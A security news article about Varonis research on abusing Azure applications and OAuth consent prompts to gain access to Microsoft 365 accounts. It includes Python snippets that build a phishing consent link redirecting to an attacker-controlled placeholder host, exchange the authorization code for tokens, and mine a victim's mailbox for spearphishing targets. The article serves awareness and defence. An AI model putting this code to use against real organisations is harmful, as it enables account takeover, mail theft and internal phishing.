Researchers warn Microsoft 365 account holders to pay attention to unknown applications that request permissions.

Kelly Sheridan, Former Senior Editor, Dark Reading

March 24, 2020

4 Min Read

Microsoft Azure applications could be weaponized to break into Microsoft 365 accounts, report researchers investigating new attack vectors as businesses transition to cloud environments.

The Varonis research team encountered this vector while exploring different ways to exploit Azure, explains security researcher Eric Saraga. While they found a few campaigns that aimed to use Azure applications to compromise accounts, they discovered little coverage of the dangers, so they decided to build a proof-of-concept app to demonstrate how such an attack might work. It's worth noting they did not discover a flaw within Azure; rather, they detail how its existing features could be abused.

"We decided to do the proof of concept after seeing potential danger — not from any specific trends," he says. "However, if anybody is utilizing what we described here to launch attacks, it will most certainly be an [advanced persistent threat] group or a very sophisticated attacker." As the cloud advances, Saraga anticipates we'll start seeing campaigns designed to use simpler versions of this attack.

Microsoft built the Azure App Service so that developers could create custom cloud applications that call and consume Azure APIs and resources. It's meant to simplify the process of building programs that integrate with different components of Microsoft 365. The Microsoft Graph API, for example, lets apps communicate with co-workers, groups, OneDrive documents, Exchange Online mailboxes, and conversations across an individual user's Microsoft 365 environment.
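To illustrate, the sketch below shows the kind of calls a consented application can make on a user's behalf through the Microsoft Graph API. It is a minimal example, not code from the Varonis research; the access token is a placeholder, and the endpoints are standard Graph v1.0 calls.

```python
import requests

GRAPH = "https://graph.microsoft.com/v1.0"
HEADERS = {"Authorization": "Bearer <delegated access token>"}  # placeholder token

# Basic profile of the signed-in user (requires the User.Read permission).
me = requests.get(f"{GRAPH}/me", headers=HEADERS).json()
print(me.get("displayName"), me.get("mail"))

# Files in the root of the user's OneDrive (requires Files.Read or broader).
items = requests.get(f"{GRAPH}/me/drive/root/children", headers=HEADERS).json().get("value", [])
for item in items:
    print(item["name"], item.get("size"))
```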

Before an app can do this, however, it must first ask an employee for access to the resources it needs. An attacker who designs a malicious app and deploys it via a phishing campaign could trick someone into granting it access to resources within the cloud. Azure applications don't require Microsoft's approval or code execution on a victim's machine, researchers point out, which makes them easier to slip past security systems.

An attacker must first have a web application and an Azure tenant to host it. From there, phishing emails are the most effective way to gain a foothold, says Saraga. An attacker could send a message with a link to install the malicious Azure app; the link would direct the user to an attacker-controlled site, which would then redirect them to Microsoft's login page.
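As a rough illustration of what such a link looks like, the snippet below builds a standard Azure AD OAuth 2.0 authorization URL for a registered application. The client ID, redirect URI, and requested scopes are illustrative placeholders, not values from the research.

```python
from urllib.parse import urlencode

# All values below are placeholders used only to show the shape of the link.
params = {
    "client_id": "00000000-0000-0000-0000-000000000000",           # attacker's app registration
    "response_type": "code",
    "redirect_uri": "https://attacker-controlled.example/callback",
    "response_mode": "query",
    "scope": "openid offline_access Mail.Read Files.Read.All",
    "state": "opaque-session-value",
}

# The link points at Microsoft's genuine sign-in endpoint, which is why it can look trustworthy.
consent_url = "https://login.microsoftonline.com/common/oauth2/v2.0/authorize?" + urlencode(params)
print(consent_url)
```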

"The authentication is handled and signed by Microsoft; therefore, even educated users might be fooled," he notes. Once the victim logs in to his or her Microsoft 365 instance, a token is created for the app and the user will be prompted to grant permissions. The prompt will look familiar to anyone who has installed an app in SharePoint or Teams; however, it's also where victims may see a red flag: "This application is not published by Microsoft or your organization."

This warning is the only clue that might indicate foul play, Saraga notes, but many people are likely to click "accept" without thinking twice. From there, a victim won't know an unauthorized party has access unless the intruder modifies or creates objects that are visible to the user, he explains.
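Behind the scenes, consent ends with Azure AD redirecting the browser to the app's registered URL along with an authorization code, which the app's backend can redeem for tokens. The sketch below shows that standard OAuth 2.0 code exchange; the client ID, secret, and redirect URI are placeholders.

```python
import requests

def redeem_code(auth_code: str) -> dict:
    """Exchange the authorization code returned to the redirect URI for tokens."""
    resp = requests.post(
        "https://login.microsoftonline.com/common/oauth2/v2.0/token",
        data={
            "client_id": "00000000-0000-0000-0000-000000000000",   # placeholder
            "client_secret": "<application secret>",               # placeholder
            "grant_type": "authorization_code",
            "code": auth_code,
            "redirect_uri": "https://attacker-controlled.example/callback",
        },
    )
    resp.raise_for_status()
    # The response contains an access_token; if offline_access was consented, a refresh_token too.
    return resp.json()
```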

With these permissions, an attacker could read emails or access files at will. The tactic is ideal for reconnaissance, launching employee-to-employee spearphishing attacks, and stealing files and emails from Office 365, Saraga adds. "By reading the user's emails, we can identify the most common and vulnerable contacts, send internal spearphishing emails that come from our victim, and infect his peers," he writes in a blog post on the findings. "We can also use the victim's email account to exfiltrate data that we find in 365."
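A minimal sketch of that kind of post-consent reconnaissance appears below, using only documented Microsoft Graph calls: it pulls recent messages with a delegated Mail.Read token (a placeholder here) and tallies the senders the victim corresponds with most. If Mail.Send were consented as well, the same token could be used to send messages that genuinely originate from the victim's mailbox.

```python
from collections import Counter

import requests

GRAPH = "https://graph.microsoft.com/v1.0"
HEADERS = {"Authorization": "Bearer <delegated access token>"}  # placeholder

# Pull the victim's recent messages and tally who they correspond with most (Mail.Read).
resp = requests.get(f"{GRAPH}/me/messages?$top=50&$select=from,subject", headers=HEADERS)
resp.raise_for_status()
senders = Counter(
    m["from"]["emailAddress"]["address"]
    for m in resp.json().get("value", [])
    if m.get("from")
)
print(senders.most_common(5))  # the contacts the research describes as likely spearphishing targets
```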

Flying Under the Radar
Granting access to an Azure app is not very different from running a malicious executable or enabling macros in a malicious file, Saraga notes. But because this technique does not require executing code on the endpoint, it is difficult to detect and block.

Microsoft does not recommend disabling third-party applications altogether, as doing so prevents users from granting consent on a tenant-wide basis and limits their ability to fully leverage third-party apps. Given this, Saraga advises paying close attention to the warning text that appears when an unknown application asks for permissions.

"First, keep a close eye on new Azure applications. Then decide if they are trustworthy or not: Are they verified? Do you know the developer? Can you trust it?" he advises. "Second, monitor user activity across the organization. Abnormal activity might indicate a compromise."


About the Author(s)

Kelly Sheridan

Former Senior Editor, Dark Reading

Kelly Sheridan was formerly a Staff Editor at Dark Reading, where she focused on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial services. Sheridan earned her BA in English at Villanova University. You can follow her on Twitter @kellymsheridan.

